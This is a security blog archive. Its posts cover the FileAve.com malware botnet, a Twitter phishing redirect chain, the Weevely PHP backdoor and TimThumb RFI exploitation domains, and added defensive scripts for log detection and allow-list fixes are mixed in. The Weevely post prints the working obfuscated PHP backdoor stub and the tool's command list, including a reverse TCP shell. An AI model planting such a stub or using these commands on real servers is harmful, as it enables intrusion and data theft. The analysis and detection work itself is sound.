Category Archives: Various

In Memory of FileAve.com Botnet

Good news for everyone: FileAve.com has finally been down since 18 October! In July 2010 I wrote a blog post on FileAve.com, a free file hosting provider notorious for spreading thousands of malware samples. FileAve.com provided 50 MB of free storage and a free subdomain for each created account (e.g. http://yourname.fileave.com). FileAve.com was owned and operated by “Ripside Interactive, Inc.“, located in the US, and more precisely by “Smith, Scott“, since September 2008. “Ripside Interactive, Inc.” was also the owner of ripway.com, another notorious malware host.

FileAve.com has been present in the Clean MX database since 2007-11-30, in the Malc0de database since 2010-01-11 and in our database since 2009-02-16.

With the data contained in our Honeynet database, I can provide the following statistics. FileAve.com and its associated subdomains were linked to 94 other malware spreaders, but FileAve.com was the most important malware spreader in this botnet. These 95 malware spreaders were regularly contacted by 1420 other source IP addresses, not themselves known for hosting malware, in order to attempt to infect new potentially vulnerable web servers or computers.

The median lifetime of the 95 malware spreaders was 5 days, with 6 of them having a lifetime above 1 year, and 2 of those 6 a lifetime above 2 years. Of the 1420 other source IP addresses, 754 were directly connected to the FileAve.com IP address.

43 of the malware spreaders were located in South Korea and 32 others in the US. 837 distinct source IP addresses contacted the malware spreaders located in the US and 309 others contacted malware spreaders located in South Korea.

The hosting country that took the longest time to shut down its malware spreaders is France, with only 2 malware spreaders located in this country but an average lifetime of 184 days. The second country is China, with 2 malware spreaders and an average lifetime of 164 days. The third is Thailand, with 2 malware spreaders and an average lifetime of 127 days. The fourth is South Korea, with 43 malware spreaders and an average lifetime of 105 days.

The FileAve.com botnet's golden age occurred between March 2010 and September 2010, with the highest ratio of active malware spreaders, the most source IP addresses and the most generated events.

If you are interested in more statistics about FileAve.com activities, I have written a PDF, available here. I have also created a geographic time map of all activities generated by the FileAve.com botnet.

Twitter Phishing “Bad blog going around about you, heard or seen it yet?”

I received an unusual private message, “Bad blog going around about you, heard or seen it yet?”, from one of my followers. Unfortunately my follower fell for a traditional Twitter phishing attack and his account is surely now compromised.

As you can see in the screenshot, the link points to “http://airtar.ru“, a domain name registered since 2011-10-13 by “[email protected]“. The web site is hosted on 111.123.180.39 in AS4134 ChinaNet GuiZhou Province, and the hosting web server redirects you directly to “http://www.twittelr.com/r/“.

HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.6
Date: Sun, 16 Oct 2011 18:48:24 GMT
Content-Type: text/html
Content-Length: 184
Connection: keep-alive
Location: http://www.twittelr.com/r/
P3P: CP="CAO COR CURa ADMa DEVa OUR IND ONL COM DEM PRE"

The “twittelr.com” domain name has been registered since 2011-09-23 by “yu zhang [email protected]“. The web site is hosted on 220.164.140.252 in AS4134 China Telecom Yunnan Province. Some funny hostnames are served by the same name server as “twittelr.com“, like “xn--fiqs8s13n4ywnyd.net“.

Accessing “http://www.twittelr.com/r/” redirects you, with the meta refresh below, to “http://www.twittelr.com/timed_out_session-/“.

<meta http-equiv="refresh" content="0; URL=/timed_out_session-/">

You will then see this phishing page, which is quite good in terms of design.

If you provide your login and password, the form posts all your information to “http://www.twittelr.com/app/login2.php” and then redirects you to the “http://www.twittelr.com/status/error/” page, but by then it is too late.

If you access the root directory of “twittelr.com” directly, you will observe a Chinese under-construction page 🙂
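When triaging a phishing link like this one, it is useful to reconstruct the redirect chain from captured responses rather than by clicking through it. The following script is an added example, not code from the original post: it takes raw HTTP responses and extracts each hop (an HTTP 301 Location header, then the meta refresh tag quoted above) and the form target where credentials would be posted, without fetching anything. The captured responses are constructed from the headers and tag shown in the post; the login form body is a constructed stand-in for the phishing page, and no real connection is made.

```python
"""Extract a phishing redirect chain from captured HTTP responses, without following anything.

Added example, not code from the original post. The captures below are constructed
from the 301 headers and the meta refresh tag quoted in the post; the login form
body is a constructed stand-in for the phishing page.
"""
import re
from urllib.parse import urljoin

# Constructed captures in request order: (URL that was requested, raw response as received).
CAPTURES = [
    ("http://airtar.ru/",
     "HTTP/1.1 301 Moved Permanently\r\n"
     "Server: nginx/1.0.6\r\n"
     "Content-Type: text/html\r\n"
     "Location: http://www.twittelr.com/r/\r\n"
     "\r\n"),
    ("http://www.twittelr.com/r/",
     "HTTP/1.1 200 OK\r\n"
     "Content-Type: text/html\r\n"
     "\r\n"
     '<html><head><meta http-equiv="refresh" content="0; URL=/timed_out_session-/"></head></html>'),
    ("http://www.twittelr.com/timed_out_session-/",
     "HTTP/1.1 200 OK\r\n"
     "Content-Type: text/html\r\n"
     "\r\n"
     '<html><body><form action="/app/login2.php" method="post">'
     '<input name="username"><input name="password" type="password"></form></body></html>'),
]

META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]+content=["\']([^"\']+)["\']', re.I)
FORM_ACTION = re.compile(r'<form[^>]+action=["\']([^"\']+)["\']', re.I)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def next_hop(request_url, raw):
    """Return ("http-3xx" or "meta-refresh", absolute target), or None when the response does not redirect."""
    status, headers, body = parse_response(raw)
    if 300 <= status < 400 and "location" in headers:
        return "http-3xx", urljoin(request_url, headers["location"])
    match = META_REFRESH.search(body)
    if match:
        # content looks like "0; URL=/path"; the "URL=" prefix is optional in practice
        _, _, target = match.group(1).partition(";")
        target = target.strip()
        if target.lower().startswith("url="):
            target = target[4:].strip()
        return "meta-refresh", urljoin(request_url, target)
    return None


def redirect_chain(captures):
    """List (from_url, mechanism, to_url) for every hop until a response stops redirecting."""
    hops = []
    for url, raw in captures:
        hop = next_hop(url, raw)
        if hop is None:
            break
        hops.append((url, hop[0], hop[1]))
    return hops


def credential_sinks(captures):
    """Absolute form targets found in the captured bodies, i.e. where submitted credentials would go."""
    sinks = []
    for url, raw in captures:
        _, _, body = parse_response(raw)
        sinks.extend(urljoin(url, action) for action in FORM_ACTION.findall(body))
    return sinks


if __name__ == "__main__":
    for src, how, dst in redirect_chain(CAPTURES):
        print(f"{src} --[{how}]--> {dst}")
    print("credential sinks:", credential_sinks(CAPTURES))
```

Both the 301 and the meta refresh are resolved relative to the URL that was requested, which is what the browser does; the form target is resolved the same way, so the output lists the absolute “/app/login2.php” URL the post identifies as the credential sink.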

Weevely Stealth Tiny PHP Backdoor Analysis

@adulau sent a tweet about a stealthy tiny PHP backdoor named Weevely, which claims to be unobtrusive and undetectable by NIDS, anti-virus and log review. Weevely simulates a telnet-like session if you communicate with the backdoor through HTTP, or an ssh-like session if you communicate with it through HTTPS.

Weevely is a Python program that lets you generate a “server” PHP code in order to trojanize a web server and take control of it. After a successful web application exploitation, for example through RFI, LFI or MySQL LOAD INFILE, you only need to upload the “server” PHP code to the target, and your local Weevely Python script will use it to transmit orders.

All commands are sent as hidden data in HTTP referrers, and these commands use dynamic probing of system-like functions to bypass PHP security restrictions. Weevely tries to bypass PHP configurations that disable sensitive functions executing external programs, set with the disable_functions option in php.ini.

Weevely Server Code Analysis & Fingerprinting

The “server” PHP code looks like this:

<?php eval(base64_decode('aW5pX3NldCgnZXJyb3JfbG9nJywgJy9kZXYvbnVsbCcpO3BhcnNlX3N0cigkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sJGEpO2lmKHJlc2V0KCRhKT09J215JyAmJiBjb3VudCgkYSk9PTkpIHtlY2hvICc8cGFzc3dvcmQ+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L3Bhc3N3b3JkPic7fQ==')); ?>

As you can see, the code is obfuscated with base64, and the result of the deobfuscation is:

ini_set('error_log', '/dev/null');              // silence PHP error logging for this script
parse_str($_SERVER['HTTP_REFERER'], $a);        // split the whole Referer header into key=value pairs
if (reset($a) == 'my' && count($a) == 9) {      // accept only a referrer whose first value is 'my' and which has exactly 9 pairs
    echo '<password>';
    eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));  // run the command carried in the last 3 values
    echo '</password>';
}

The script forces PHP to send its errors to “/dev/null“, parses the HTTP referrer and decodes the commands with the provided password.

If you test the “server” code on VirusTotal, only 1 of 43 anti-virus engines detects the code as malware. But the obfuscation method is basic and the code is only encoded once; surely most anti-virus engines will detect it in the near future.

Currently most common PHP backdoors, like c99, STUNSHELL, etc., embed the complete malware code and obfuscate it with basic methods. Weevely's HTTP referrer approach is quite interesting and new: the code is no longer embedded but dynamic.

But some common PHP backdoors are now obfuscated with more complex methods, like “gzinflate(str_rot13(base64_decode(‘malware’)))”, and encoded more than 10 times. These codes are only detected by a few anti-virus engines, like this one on VirusTotal.

On the web server side, when a Weevely command is sent to the “server” PHP code, you will see this typical kind of entry in your access.log file.

192.168.178.25 - - [11/Oct/2011:00:44:25 +0200] "GET /mybb/readme.php HTTP/1.0" 200 237 "http://www.google.com/url?sa=my&source=web&ct=7&url=http%3A//blackbox.zataz.loc/mybb/readme.php&rct=j&q=mybb readme&ei=ZWNob&usg=yA1Nz&sig2=ExNjs=" "Python-urllib/1.17, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"

You can see that the HTTP referrer is google.com and that the command is encoded. If you compare the Weevely HTTP referrer with a normal google.com HTTP referrer, below, you can see that there are really few differences. It is clearly impossible to distinguish a valid HTTP referrer from a forged one.

xxx.xxx.xxx.xxx - - [11/Sep/2011:20:45:52 +0200] "GET /2011/02/06/cve-2010-3867-proftpd-iac-remote-root-exploit/ HTTP/1.1" 200 11751 "http://www.google.com/url?sa=t&source=web&cd=12&ved=0CB8QFjABOAo&url=http%3A%2F%2Feromang.zataz.com%2F2011%2F02%2F06%2Fcve-2010-3867-proftpd-iac-remote-root-exploit%2F&rct=j&q=proftpd%20IAC%20Buffer%20Overflow&ei=2wFtTt6jHMjd4QS8iunYBA&usg=AFQjCNHZ_21-rBnWO0Hu3YgMYub6dE7oqA&sig2=fHqAoyj7khMooGBCTuuqyw" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"

Unfortunately for the Weevely authors, the Python User-Agent is recognized by basic NIDS rules such as Emerging Threats (SIG 2013031).

Oct 11 22:31:27 fw3 snort[4069]: [1:2013031:1] ET POLICY Python-urllib/ Suspicious User Agent [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.178.25:54037 -> 192.168.178.61:80

Also unfortunately for the Weevely authors, if you have PHP safe_mode enabled, you will also have this typical kind of entry in your error.log file. A regular log review will detect this kind of error.

[Tue Oct 11 00:44:25 2011] [error] [client 192.168.178.25] PHP Warning:  ini_set(): SAFE MODE Restriction in effect.  The script whose uid is 33 is not allowed to access /dev/null owned by uid 0 in /var/www/mybb/readme.php(1) : eval()'d code on line 1, referer: http://www.google.com/url?sa=my&source=web&ct=7&url=http%3A//blackbox.zataz.loc/mybb/readme.php&rct=j&q=mybb readme&ei=ZWNob&usg=yA1Nz&sig2=ExNjs=
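The two access.log lines above look alike to the eye, but the deobfuscated server stub gives a log reviewer something precise to key on: it only acts on a referrer whose first query value is “my” and which carries exactly 9 parameters, and it base64-decodes the last three values joined together. The following script is an added example, not code from the original post or from the Weevely project. It applies that same acceptance test to Apache access.log lines, decodes what the forged referrer carries, flags the Python-urllib User-Agent the ET rule fires on, and picks out error.log entries raised from eval()'d code. The sample input is the two access.log lines and the error.log line quoted in the post, embedded as constructed strings; the forged referrer from the post decodes to a short echo command.

```python
"""Flag Weevely-style traffic in Apache logs and decode the command a forged referrer carries.

Added example, not code from the original post or from the Weevely project. The
acceptance test mirrors the deobfuscated server stub quoted in the post: first query
value equal to 'my', exactly 9 parameters, and the last three values joined and
base64-decoded (spaces restored to '+'). The log lines are the two access.log lines
and the error.log line quoted in the post, embedded here as sample input.
"""
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

WEEVELY_REFERER = ("http://www.google.com/url?sa=my&source=web&ct=7&url=http%3A//blackbox.zataz.loc"
                   "/mybb/readme.php&rct=j&q=mybb readme&ei=ZWNob&usg=yA1Nz&sig2=ExNjs=")
LEGIT_REFERER = ("http://www.google.com/url?sa=t&source=web&cd=12&ved=0CB8QFjABOAo&url=http%3A%2F%2F"
                 "eromang.zataz.com%2F2011%2F02%2F06%2Fcve-2010-3867-proftpd-iac-remote-root-exploit%2F"
                 "&rct=j&q=proftpd%20IAC%20Buffer%20Overflow&ei=2wFtTt6jHMjd4QS8iunYBA"
                 "&usg=AFQjCNHZ_21-rBnWO0Hu3YgMYub6dE7oqA&sig2=fHqAoyj7khMooGBCTuuqyw")

ACCESS_LOG = [
    '192.168.178.25 - - [11/Oct/2011:00:44:25 +0200] "GET /mybb/readme.php HTTP/1.0" 200 237 "'
    + WEEVELY_REFERER + '" "Python-urllib/1.17, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; '
    'rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"',
    'xxx.xxx.xxx.xxx - - [11/Sep/2011:20:45:52 +0200] "GET /2011/02/06/cve-2010-3867-proftpd-iac-'
    'remote-root-exploit/ HTTP/1.1" 200 11751 "' + LEGIT_REFERER + '" "Mozilla/5.0 (Macintosh; U; '
    'Intel Mac OS X 10_6_8; en-us) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"',
]

ERROR_LOG = [
    "[Tue Oct 11 00:44:25 2011] [error] [client 192.168.178.25] PHP Warning:  ini_set(): SAFE MODE "
    "Restriction in effect.  The script whose uid is 33 is not allowed to access /dev/null owned by "
    "uid 0 in /var/www/mybb/readme.php(1) : eval()'d code on line 1, referer: " + WEEVELY_REFERER,
]


def weevely_payload(referer):
    """Decoded command if the referrer passes the stub's acceptance test, else None."""
    params = parse_qsl(urlsplit(referer).query, keep_blank_values=True)
    if len(params) != 9 or params[0][1] != "my":
        return None
    # '+' in base64 arrives as a space after URL decoding; the stub reverses that too
    blob = "".join(value for _, value in params[-3:]).replace(" ", "+")
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:          # not valid base64: a benign referrer that merely looks similar
        return None


def scan_access(lines):
    """Return (client ip, request, [reasons]) for every access.log line that looks like Weevely."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        reasons = []
        if "python-urllib" in m["ua"].lower():
            reasons.append("Python-urllib user agent (ET POLICY SIG 2013031)")
        payload = weevely_payload(m["referer"])
        if payload is not None:
            reasons.append("referrer carries command: " + payload)
        if reasons:
            findings.append((m["ip"], m["req"], reasons))
    return findings


def scan_error(lines):
    """error.log entries raised from eval()'d code, which is where an in-referrer backdoor runs."""
    return [line for line in lines if "eval()'d code" in line]


if __name__ == "__main__":
    for ip, req, reasons in scan_access(ACCESS_LOG):
        print(ip, req, "->", "; ".join(reasons))
    for line in scan_error(ERROR_LOG):
        print("error.log:", line[:90], "...")
```

The genuine Google referrer has 10 parameters and starts with sa=t, so it never reaches the base64 step; a referrer that happens to have 9 parameters but whose tail is not valid base64 is rejected by validate=True. Run over the post's lines, only the 192.168.178.25 request is flagged, on both the User-Agent and the decodable referrer.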

The current Weevely version is identifiable by NIDS through the User-Agent or by regular log review, but clearly the approach is really interesting and future version

Weevely Usage

  • Invoke Weevely help

To invoke the Weevely help you only need to execute the following command:

  • Weevely server code generation

To generate the “server” code you only need to execute the following command, where “mypassword” is your desired password and “readme.php” the backdoor PHP file that needs to be uploaded to the target web server.

  • Start a telnet or ssh like session and exploitation

To start a telnet-like (HTTP) or ssh-like (HTTPS) session you only need to execute the following command:

As you can see in the screenshot, the interpreter is “shell.sh”, which allows you to execute shell commands. The other interpreter is “shell.php”, which allows you to execute PHP commands. You can also invoke the backdoor help with the “:help” command. Below is the list of modules with their methods.

[backdoor] [reverse_tcp] Send reverse shell using TCP socket
           :backdoor.reverse_tcp ip port

[shell] [sh] Execute system commands
        :shell.sh ""

        [php] Execute single PHP commands
        :shell.php ";"

[find] [perms] Find files with write, read, execute permissions
       :find.perms first|all file|dir|all w|r|x|all 

       [webdir] Find writable directory and get corresponding URL
       :find.webdir

       [suidsgid] Find suid, sgid, or every file with superuser flag
       :find.suidsgid suid|sgid|all 

       [binaries] Find executables in common PATH folders
       :find.binaries all | 

       [name] Find files with name that match string
       (e=equal, ei= equal case insensitive , c= contains, ci= contains case insensitive)
       :find.name e|ei|c|ci  

[file] [read] Read file outside web root using different techniques
       :file.read 

       [download] Download remote binary/ascii files
       :file.download  

       [upload] Upload local binary/ascii file using POST method
       :file.upload  

       [check] Check remote files presence, type, md5 and permissions
       :file.check  exists|file|dir|md5|r|w|x

[system] [info] Collect system informations
         :system.info all|whoami|hostname|basedir|document_root

         [users] Enumerate system users using different techniques
         :system.users

WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector

On 1 August 2011, Mark Maunder revealed, through a defacement experience, that the “timthumb.php” script, included in hundreds of WordPress themes, was vulnerable to a remote file inclusion (RFI) attack. TimThumb is a small PHP script for cropping, zooming and resizing web images (jpg, png, gif).

The default configuration of the “timthumb.php” script, in many WordPress themes, allows remote file inclusion from the following domains:

  • flickr.com
  • picasa.com
  • blogger.com
  • wordpress.com
  • img.youtube.com
  • upload.wikimedia.org
  • photobucket.com

Unfortunately the domain verification code was buggy, allowing remote file inclusion if one of the above domain strings appears anywhere in the hostname, for example: picasa.com.zataz.com.
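The bug is a classic allow-list mistake: matching the trusted domain as a substring of the hostname instead of at a label boundary. The following script is an added example, not the TimThumb project's code: allowed_substring() reconstructs the flaw as the post describes it (the real script's exact code is not reproduced here), and allowed_suffix() is the corrected check, which accepts only an allowed domain or a true subdomain of one and, as an extra hardening I added, only http(s) URLs. The sample URLs are constructed from the allow-list above and from hostnames quoted later in this post; nothing is fetched.

```python
"""Host allow-list check for a remote image fetcher: the substring flaw beside a boundary-aware fix.

Added example, not the TimThumb project's code. allowed_substring() reconstructs the flaw
the post describes (an allowed domain string accepted anywhere in the hostname); the real
script's exact code is not reproduced. allowed_suffix() is the corrected check. The sample
URLs are constructed from the allow-list and the hostnames quoted in the post; nothing is fetched.
"""
from urllib.parse import urlsplit

ALLOWED_DOMAINS = [
    "flickr.com", "picasa.com", "blogger.com", "wordpress.com",
    "img.youtube.com", "upload.wikimedia.org", "photobucket.com",
]


def allowed_substring(url):
    """Flawed: accept if any allowed domain appears anywhere in the host."""
    host = (urlsplit(url).hostname or "").lower()
    return any(domain in host for domain in ALLOWED_DOMAINS)


def allowed_suffix(url):
    """Fixed: http(s) only, and the host must be an allowed domain or a subdomain of one.

    The leading dot enforces a label boundary, so 'picasa.com.xpl.be' and
    'picasa.compress.cu.cc' no longer qualify while 'farm3.static.flickr.com' still does.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    return any(host == domain or host.endswith("." + domain) for domain in ALLOWED_DOMAINS)


# Constructed sample: URL -> whether it should be accepted (True only for genuine image hosts).
SAMPLE_URLS = {
    "http://farm3.static.flickr.com/2345/image.jpg": True,
    "http://img.youtube.com/vi/abc123/0.jpg": True,
    "http://upload.wikimedia.org/wikipedia/commons/x.png": True,
    "http://picasa.com.xpl.be/image.php": False,
    "http://picasa.compress.cu.cc/image.php": False,
    "http://blogger.com.aptum.nu/image.php": False,
}


def misclassified(check, samples=SAMPLE_URLS):
    """URLs on which `check` disagrees with the expected verdict."""
    return sorted(url for url, expected in samples.items() if check(url) != expected)


if __name__ == "__main__":
    print("substring check accepts wrongly:", misclassified(allowed_substring))
    print("suffix check misclassifies:", misclassified(allowed_suffix))
```

Note that “picasa.compress.cu.cc” never contains a label equal to “picasa.com” at all; the substring check still accepts it because “picasa.com” is a prefix of “picasa.compress”, which is exactly why a boundary-aware suffix comparison, not a plain string search, is the right fix.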

To create such DNS entries you need control of a zone hosted by a DNS server, so this attack vector is more complex than a simple RFI attack, which doesn't need this kind of resource.

For a few weeks now I have observed through my Honeynet that attempts to exploit this vulnerability are increasing and that it is now fully integrated as a dork into ByroeNet-like tools. The fact is that more and more exploitable DNS entries are being created that allow the TimThumb vulnerability to be exploited.

For example, one of the most active TimThumb vulnerability domains is currently “picasa.com.xpl.be“, which has the following details:

  • RFI IP : 98.158.186.250
  • RFI FQDN : 90.158.186.250.static.midphase.com
  • RFI Country : United States

The authoritative name servers for the “picasa.com.xpl.be” and “xpl.be” domain names are:

; AUTHORITY SECTION:
xpl.be.			81644	IN	NS	ns2.afraid.org.
xpl.be.			81644	IN	NS	ns3.afraid.org.
xpl.be.			81644	IN	NS	ns1.afraid.org.
xpl.be.			81644	IN	NS	ns4.afraid.org.

;; ADDITIONAL SECTION:
ns1.afraid.org.		508	IN	A	67.19.72.206
ns2.afraid.org.		206	IN	A	174.37.196.55
ns3.afraid.org.		26	IN	A	72.20.15.61
ns4.afraid.org.		26	IN	A	174.128.246.102

afraid.org is a provider of free DNS hosting, dynamic DNS hosting, static DNS hosting, subdomain and domain hosting services.

The xpl.be domain name was registered on 5 April 2010 through Key-Systems GmbH, a German domain name registrar, and the registration information is:

Registrant
Name : Dolores Aleman
Organisation : Dolores Aleman
Address : 1014 south 2nd st - 78550 Harlingen AL US
Email : [email protected]

Registrant technical contacts
Name : Mr XpL
Organisation : XpL inc
Address : 1014 south 2nd st - 78550 Harlingen AL US
Email : [email protected]

Both “picasa.com.xpl.be” and “xpl.be” are hosted on IP 98.158.186.250 at midPhase.com, a hosting service provider, but this hosting service provider doesn't provide any free hosting services. Also, as you can see below, the xpl.be web site designer knows ASCII art.

Another example is “picasa.compress.cu.cc“, registered on “cu.cc” on 13 September 2011 by “[email protected]“. The domain name and website are hosted on 50Webs.com, a free DNS and hosting provider.

“picasa.computergoogle.co.cc“, registered on the “co.cc” registrar on 22 September 2011 by “[email protected]“. The domain name and website are hosted on 50Webs.com, a free DNS and hosting provider.

“wordpress.com.daliacarella.com“, registered on “www.000domains.com” on 17 July 2011 by “[email protected]”. The domain name and the website are hosted on HostDime.com.

“blogger.com.donshieldphotography.com“, registered with Visual Solutions Group Inc on 19 January 2011 by “Don Shield Photography“. The domain name and the website are hosted at Visual Solutions Group Inc. “www.donshieldphotography.com” seems to be a legitimate web site, but the Visual Solutions Group Inc infrastructure also seems compromised.

“blogger.com.aptum.nu“, registered on nunames.nu on 24 October 2006 by “[email protected]”. The domain name and the website are hosted at ODERLAND. “aptum.nu” seems to be a legitimate web site.

“blogger.com.jewelhost.co.uk”, registered on 123-reg.co.uk on 04 May 2010 by “Callum Baillie”. The domain name and the website are hosted at JewelHost.co.uk, a hosting provider that seems to be compromised.

“blogger.com.tara-baker.com”, registered with Tucows Domains on 07 January 2010 by “UK2.net”. The domain name and the website are hosted at VC-Hosting.com, a hosting provider that seems to be compromised.

“picasa.com.marcialia.com.br” has its domain name and website hosted at SERVER4YOU, a hosting provider that offers a free 6-month hosting trial. marcialia.com.br seems to be a legitimate web site; the account seems to be compromised.

Other domains that are also participating in the TimThumb botnet: “picasa.com.crimecyber.tk“, “blogger.com.1h.hu“, “picasa.com.nixonmu.com“, “blogger.com.lionsurveys.com“, “blogger.com.autoelectricahernandez.com“.

You also have “picasa.com.throngbook.com” and “blogger.com.cursos.secundariatecnica33.org”, which are currently down.

All these compromised sites seem to be related to the Indonesian Byroe.net network.

Below you can find some live stats on the TimThumb vulnerability exploitation attempts detected by our Honeynet.